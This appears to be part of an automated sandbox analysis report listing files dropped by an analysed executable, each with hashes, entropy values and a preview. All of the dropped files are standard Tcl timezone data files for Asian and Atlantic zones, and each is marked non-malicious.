                                                                                                                                                                                                                              SHA1:2D715749469FEA51A8E25D1F4F8DC4FF9178817D
                                                                                                                                                                                                                              SHA-256:3BEF13638C46F16435D326C675907E61BB68C8173153CED3359E983BE0E413E5
                                                                                                                                                                                                                              SHA-512:27954FEC865031BC363CFDE94E97B3B19836A6F777646EA4AAB12ECCAEE6D60A0C690711EA192B917AC717F94A01D1EF64BAE97DF968069CC12415971B070498
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yakutsk) {.. {-9223372036854775808 31138 0 LMT}.. {-1579423138 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {76470
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):244
                                                                                                                                                                                                                              Entropy (8bit):4.692243303623333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKs5XDm2OHGVQoHvZN6FCDx+UIFDVkvScHbY/s5UIAy:MB862KTmdHGuCvZNNkkHH3Sy
                                                                                                                                                                                                                              MD5:D45766D30074719C9A88ACE8BB53204B
                                                                                                                                                                                                                              SHA1:69B333DFCCCCEB66DD0F7DC28B272BB10769B6B0
                                                                                                                                                                                                                              SHA-256:2526557810747E78E713AE09BC305621A80FAEECF8D441632E7825738D4C79CB
                                                                                                                                                                                                                              SHA-512:5255DEED72D7D13862A4D6BED7E0458C099D2EF5A1B41536CAA7C0E65A61DE8B8D1AD62AD44559F970B6613ADFB3862778D1CC99B9A05CB5BBCA7F0202B5A5B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yangon) {.. {-9223372036854775808 23087 0 LMT}.. {-2840163887 23087 0 RMT}.. {-1577946287 23400 0 +0630}.. {-873268200 32400 0 +09}.. {-778410000 23400 0 +0630}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2095
                                                                                                                                                                                                                              Entropy (8bit):3.704641905144701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5ievNhYvm1qv7vXIovPvSvlDvtvuovKKvKcNvHvAvivBvqvvEyv8vlvEv+v4v+v+:/Nupj40H6l75FKCKcZP8qdyEaoBAWkW+
                                                                                                                                                                                                                              MD5:D4DABA407BB8A10E4961D1DE5D9781D1
                                                                                                                                                                                                                              SHA1:6933DE65336331BD90E2BEC6AEA0609B16DAEDC9
                                                                                                                                                                                                                              SHA-256:2C78699EFC60758B8F8D0D1DEEDFDED5E65C65EBF3082B23E60BDEA8BF8FBCFE
                                                                                                                                                                                                                              SHA-512:459E2187FAA66414F5CE934C335F563DFD2FA5316B86A54D1A29123A0460AFD65B7CE46629BD6A070A14CB6873A28A2F2803DE5FF4F29EA610712EB07FAD303F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yekaterinburg) {.. {-9223372036854775808 14553 0 LMT}.. {-1688270553 13505 0 PMT}.. {-1592610305 14400 0 +04}.. {-1247544000 18000 0 +06}.. {354913200 21600 1 +06}.. {370720800 18000 0 +05}.. {386449200 21600 1 +06}.. {402256800 18000 0 +05}.. {417985200 21600 1 +06}.. {433792800 18000 0 +05}.. {449607600 21600 1 +06}.. {465339600 18000 0 +05}.. {481064400 21600 1 +06}.. {496789200 18000 0 +05}.. {512514000 21600 1 +06}.. {528238800 18000 0 +05}.. {543963600 21600 1 +06}.. {559688400 18000 0 +05}.. {575413200 21600 1 +06}.. {591138000 18000 0 +05}.. {606862800 21600 1 +06}.. {622587600 18000 0 +05}.. {638312400 21600 1 +06}.. {654642000 18000 0 +05}.. {670366800 14400 0 +05}.. {670370400 18000 1 +05}.. {686095200 14400 0 +04}.. {695772000 18000 0 +06}.. {701816400 21600 1 +06}.. {717541200 18000 0 +05}.. {733266000 21600 1 +06}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2029
                                                                                                                                                                                                                              Entropy (8bit):3.6487650030366106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5O4GeuadYlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUUUl2ue/:5xKdsUf8mFpNWFnyLCPYmPJSi3sh4
                                                                                                                                                                                                                              MD5:2CFA7C55D0731D24679CA5D5DC716381
                                                                                                                                                                                                                              SHA1:2BB66783D75C71E76409365757980FBC15F53231
                                                                                                                                                                                                                              SHA-256:20871FA6AA959DDFB73D846271B4A568627B564CFC08A11BDD84B98C2F2019A3
                                                                                                                                                                                                                              SHA-512:CAB10A48859B2C0B2CC7C56E0AA530AE7E506A4986BADC5ED974D124BD46DB328B50C423F83FCFD52D31962A249EEFC10351798B86D51EDA500F412C8D42E6BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yerevan) {.. {-9223372036854775808 10680 0 LMT}.. {-1441162680 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 10800 0 +03}.. {733273200 14400 1 +03}.. {748998000 10800 0 +03}.. {764722800 14400 1 +03}.. {780447
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9879
                                                                                                                                                                                                                              Entropy (8bit):3.557602151081988
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:K35nZPOUYySoluItljncxelTMwtrayE6x5sETNek/CyNzybxYKmX6SXL/XbEcygI:K940pb6cL/b3Ldr9Q7TMq+ML
                                                                                                                                                                                                                              MD5:E7F2A3EE0362E9ED3ECBAD24168AD098
                                                                                                                                                                                                                              SHA1:98832274F6D9B641B809123D1272A1C04EEAA177
                                                                                                                                                                                                                              SHA-256:6B3609BE4E93D21A2AB492594EDD387931E2C787E8471C9F2D3A677F34002D8F
                                                                                                                                                                                                                              SHA-512:C48A76F8251AE455C759CB98802E40B3BEF716FD8E7441B6DE0242942C913367E3572B7C871082E97CA9BE67EC7DC37F8D01C438965217AC0EC36AD508DCE0D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Azores) {.. {-9223372036854775808 -6160 0 LMT}.. {-2713904240 -6872 0 HMT}.. {-1830376800 -7200 0 -02}.. {-1689548400 -3600 1 -01}.. {-1677794400 -7200 0 -02}.. {-1667430000 -3600 1 -01}.. {-1647730800 -7200 0 -02}.. {-1635807600 -3600 1 -01}.. {-1616194800 -7200 0 -02}.. {-1604358000 -3600 1 -01}.. {-1584658800 -7200 0 -02}.. {-1572735600 -3600 1 -01}.. {-1553036400 -7200 0 -02}.. {-1541199600 -3600 1 -01}.. {-1521500400 -7200 0 -02}.. {-1442444400 -3600 1 -01}.. {-1426806000 -7200 0 -02}.. {-1379286000 -3600 1 -01}.. {-1364770800 -7200 0 -02}.. {-1348441200 -3600 1 -01}.. {-1333321200 -7200 0 -02}.. {-1316386800 -3600 1 -01}.. {-1301266800 -7200 0 -02}.. {-1284332400 -3600 1 -01}.. {-1269817200 -7200 0 -02}.. {-1221433200 -3600 1 -01}.. {-1206918000 -7200 0 -02}.. {-1191193200 -3600 1 -01}.. {-1175468400 -7200 0 -02}.. {-1127689
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8784
                                                                                                                                                                                                                              Entropy (8bit):3.833553120942514
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZRBHksL3zq6bCvyjvspNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/+:ft0CC
                                                                                                                                                                                                                              MD5:B04E22B9B42722013941169B5D04DEA2
                                                                                                                                                                                                                              SHA1:32B96A7D9504D5022A6C4E2D310E95B5F062947F
                                                                                                                                                                                                                              SHA-256:099C3BEFBA3B4C00AE19BC53D475A52B32FAC9B36EC823C8EAEFC7D00F78F388
                                                                                                                                                                                                                              SHA-512:8B93BCA1E923B7A43F2EB0889216E8FF991D13CB8D25BD300310ED7CD8537DBD858E8F422C9B52AE2F52F7C1CB450EF0B7C5C1B3AE547C9C1E18E2A851569DD5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Bermuda) {.. {-9223372036854775808 -15558 0 LMT}.. {-2524506042 -15558 0 BMT}.. {-1664307642 -11958 1 BMT}.. {-1648932042 -15558 0 BMT}.. {-1632080442 -11958 1 BMT}.. {-1618692042 -15558 0 BST}.. {-1262281242 -14400 0 AT}.. {-882727200 -10800 1 ADT}.. {-858538800 -14400 0 AST}.. {-845229600 -10800 1 ADT}.. {-825879600 -14400 0 AST}.. {-814384800 -10800 1 ADT}.. {-793825200 -14400 0 AST}.. {-782935200 -10800 1 ADT}.. {-762375600 -14400 0 AST}.. {-713988000 -10800 1 ADT}.. {-703710000 -14400 0 AST}.. {-681933600 -10800 1 ADT}.. {-672865200 -14400 0 AST}.. {-650484000 -10800 1 ADT}.. {-641415600 -14400 0 AST}.. {-618429600 -10800 1 ADT}.. {-609966000 -14400 0 AST}.. {-586980000 -10800 1 ADT}.. {-578516400 -14400 0 AST}.. {-555530400 -10800 1 ADT}.. {-546462000 -14400 0 AST}.. {-429127200 -10800 1 ADT}.. {-415825200 -14400 0 AST}.. {1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6856
                                                                                                                                                                                                                              Entropy (8bit):3.8064107143060752
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KXVuHfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:KXVQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:8ABD279386C50705C074EEE18BF5AE59
                                                                                                                                                                                                                              SHA1:C392231DBE744F5942DA4BFAC8AD0ABEBAEA0BF3
                                                                                                                                                                                                                              SHA-256:2026944DCDEBC52F64405E35119F4CF97EA9AA1E769498730880B03F29A2B885
                                                                                                                                                                                                                              SHA-512:3095759D01AC7EEA25E427CA38E8A0395BEFA7250E7A0C1327BF9D61F07F4570CDF7313FBE6695973EB0DD66D201C6C63591CC0DA8A1E0029926DC7056F4C95B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Canary) {.. {-9223372036854775808 -3696 0 LMT}.. {-1509663504 -3600 0 -01}.. {-733874400 0 0 WET}.. {323827200 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):246
                                                                                                                                                                                                                              Entropy (8bit):4.637993677747699
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2RQ7RfDm2OHDoH1JlvQV/FFrR3FcykVvQV/FFf+nmwV:MB86267RLmdHDC1w/FH3FcyL/FomwV
                                                                                                                                                                                                                              MD5:1581C6470850E0C9DB204975488B1AF8
                                                                                                                                                                                                                              SHA1:6933ED13F18AD785CEDF0837F86EFAC671297A85
                                                                                                                                                                                                                              SHA-256:2EA59ACDB5BBDD3C6ABCEEA456838A5CA57371A3D2BB93604B37F998ED8B9D4D
                                                                                                                                                                                                                              SHA-512:9FFFA013D82CEFF6F447521C19270ECDD71152F23670164423E6013FEC46253C62D2CB79B42630BD786BD113F27369E746CA981DD17E789F7571F473B47247C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Cape_Verde) {.. {-9223372036854775808 -5644 0 LMT}.. {-1830376800 -7200 0 -02}.. {-862610400 -3600 1 -01}.. {-764118000 -7200 0 -02}.. {186120000 -3600 0 -01}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.709193799640151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqLG4E23vXHAIgvMG4EeRRL/2RQqG4EZrB/4RQqG4E1n:SlSWB9vsM3yCPHAIgvoRN/2RQ1rB/4Ri
                                                                                                                                                                                                                              MD5:601EB889A87F9CAD6F1DF4D1AB009FAE
                                                                                                                                                                                                                              SHA1:EB43C253A48755442A67A2408D7E3295549F831C
                                                                                                                                                                                                                              SHA-256:64FB8CAD17CD36666C7027AAD01344FEF659B13699EEF1942365842F8ED2170E
                                                                                                                                                                                                                              SHA-512:9CFC4A446ED6A3BEF6C26AE57324F10A970EE2ADD6933130447FAD6A3DB538841F2490DD461AF5776FACD9BD2CDC4A83247DFA6B34802AE844DDC6D4C37B28EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Atlantic/Faroe)]} {.. LoadTimeZoneFile Atlantic/Faroe..}..set TZData(:Atlantic/Faeroe) $TZData(:Atlantic/Faroe)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6796
                                                                                                                                                                                                                              Entropy (8bit):3.804838552487436
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:96ufXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:/bkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:F97CC7EB9C52D00177BFF4715832FCD5
                                                                                                                                                                                                                              SHA1:CD9DCBB5E6ADD6EA91C8F142957EC229FC7F6DA3
                                                                                                                                                                                                                              SHA-256:795F438E7F01342D5F25ECCDD09FCE65C03C5D2D561B9B5191301D57EC16B850
                                                                                                                                                                                                                              SHA-512:9586289FEB6C597160011A47432F0AC40000483FA2E579BD89046EFD33E98DDAD652B792FD80CEDEB4CD87B6439A7B473F25F1B7375BC75353CBAF9F77E1084E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Faroe) {.. {-9223372036854775808 -1624 0 LMT}.. {-1955748776 0 0 WET}.. {347155200 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600 3600 1 WEST}.. {811904400 0 0 WET}.. {828234000 3600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.957633978425468
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2RQqG0EHEcAg/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2RQaK85
                                                                                                                                                                                                                              MD5:95C2D55CCE5809089CDB041EA3D464F8
                                                                                                                                                                                                                              SHA1:B395F5F26CE979BDF2B9E2CB51C06929AED11A6C
                                                                                                                                                                                                                              SHA-256:11BF0746F95BA01807D3B34C8FAE3FF4AE9DB5E4E6BC0CB8B36906CC3F44EDE5
                                                                                                                                                                                                                              SHA-512:AB2BE22E95A7C36E18EBA1BB63B3930A523ED793E43A3F597A8F63AE2F0E44436C39144BC136E7E5716D7FCBFAE7F1FAF36BCFFCF9C8D51151FF25BB14D6F8B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Atlantic/Jan_Mayen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9709
                                                                                                                                                                                                                              Entropy (8bit):3.80455694200614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:hZUiLbMsf/ss0qKd+aKyUXtOZHY1SCOcesoQivoKbFVCdm1rXWNXyCXTOuUbkIaq:hZZDQX1rWJysukysLE3+sSGjT
                                                                                                                                                                                                                              MD5:AC6647F9B53B5958214EC3F3B78A4D85
                                                                                                                                                                                                                              SHA1:7355622AF99296F069F73899D5C70941C207F676
                                                                                                                                                                                                                              SHA-256:B2A0D0DDC26806A05B2BE806CA3F938DB12A3FA40110B8B21FD3F04EFED3A531
                                                                                                                                                                                                                              SHA-512:07569CA4D5DC6D57D91D6FDC370671A7546B73BA653D094E1B501D33570F7700727AD7FF2A083BC79E9EDE807C47E7A5604BEF5803F290B2F277C51DEF10FA6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Madeira) {.. {-9223372036854775808 -4056 0 LMT}.. {-2713906344 -4056 0 FMT}.. {-1830380400 -3600 0 -01}.. {-1689552000 0 1 +00}.. {-1677798000 -3600 0 -01}.. {-1667433600 0 1 +00}.. {-1647734400 -3600 0 -01}.. {-1635811200 0 1 +00}.. {-1616198400 -3600 0 -01}.. {-1604361600 0 1 +00}.. {-1584662400 -3600 0 -01}.. {-1572739200 0 1 +00}.. {-1553040000 -3600 0 -01}.. {-1541203200 0 1 +00}.. {-1521504000 -3600 0 -01}.. {-1442448000 0 1 +00}.. {-1426809600 -3600 0 -01}.. {-1379289600 0 1 +00}.. {-1364774400 -3600 0 -01}.. {-1348444800 0 1 +00}.. {-1333324800 -3600 0 -01}.. {-1316390400 0 1 +00}.. {-1301270400 -3600 0 -01}.. {-1284336000 0 1 +00}.. {-1269820800 -3600 0 -01}.. {-1221436800 0 1 +00}.. {-1206921600 -3600 0 -01}.. {-1191196800 0 1 +00}.. {-1175472000 -3600 0 -01}.. {-1127692800 0 1 +00}.. {-1111968000 -3600 0 -01}.. {-
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.910514445868106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGsA/8rVDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQjQD4
                                                                                                                                                                                                                              MD5:ECB480DA99D29C0ACE67426D45534754
                                                                                                                                                                                                                              SHA1:784CF126B030C3D883EE541877E6181F795C9697
                                                                                                                                                                                                                              SHA-256:BDA015714260001BAE2848991DD21E802580BE2915797E5DABC376135D1C5246
                                                                                                                                                                                                                              SHA-512:54C1B20E45C7C73354DCD4E0F4444720771820ED10B282F745DC391BEADEAEDC629BEF97B1908FB62CDAEC915D32AF1F54FC6AA9DC83E317E7CE19FC2586EF28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/Reykjavik) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):160
                                                                                                                                                                                                                              Entropy (8bit):5.011466665416709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2RQqGtlN62/EiMXGm2OHXT14YoHvhFvdQVIyV:SlSWB9eg/2RQrlo2MiDm2OHXqYoHvTFS
                                                                                                                                                                                                                              MD5:3B310BB8C90CA716DC1AC5A697ACA9CD
                                                                                                                                                                                                                              SHA1:CD583F49478DCDAD91EF78539502C6FC62945C1E
                                                                                                                                                                                                                              SHA-256:51BFABCB3388107753A3C1A8CF31118E6627132BAA09B9878D9E7CEDBEBB4886
                                                                                                                                                                                                                              SHA-512:F593B7A1FAF0EA6B42D5EE86C20C9A8F5CD7ACD9B30EF7755E45ECAFEA8752C32E4CF4BEDF531F494E59D9F0C49CCC6FCA077292E20794AA265DFC0A56DFE579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/South_Georgia) {.. {-9223372036854775808 -8768 0 LMT}.. {-2524512832 -7200 0 -02}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.880390141563645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGt4r+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQr4rV
                                                                                                                                                                                                                              MD5:2C73A963F515376A46762CE153AAF5C5
                                                                                                                                                                                                                              SHA1:996C3C93DFAD89EA80AC5DFA1DFBD7CECD9ED28D
                                                                                                                                                                                                                              SHA-256:1C9CA8966FC8BD0BE70F4A187E17E56FB99139BC88C392E82BA2E23E23111C54
                                                                                                                                                                                                                              SHA-512:35A9ADC047DB058D71C21FC4ECB57CD14B0D9BA4416506763D1800D72CE6C9E81636F332AAD3533616F05C86F90A60416BD4065C5F832A51AA3DC186218BDCAE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/St_Helena) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2256
                                                                                                                                                                                                                              Entropy (8bit):3.662522763865322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:506KSBSdSs2SbSwGSyPU3lSsS5SGScSo/SkSuShSceS3SBSc7XSiSgSwSd/SJkS6:JKU+Ew0FU1TuhrR//tOIoOjXZfDWSkPR
                                                                                                                                                                                                                              MD5:77C7ECE4FCBE150069B611C75E8DAA0E
                                                                                                                                                                                                                              SHA1:22F4E5F15BCA92D8456B70BB36230F2605CA5E1C
                                                                                                                                                                                                                              SHA-256:F0E99EF01F140CD5AAFE16803A657922207E6F7F6AF10B0AE795790916C302C4
                                                                                                                                                                                                                              SHA-512:6FB57E8499A587292AFAFA9BD003721572393D5268CAF956230DA76983A112B27D6731BE561A22CCEF84935F43AC988B667C2DC404C157EA8D0E7830FC1A2AB8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
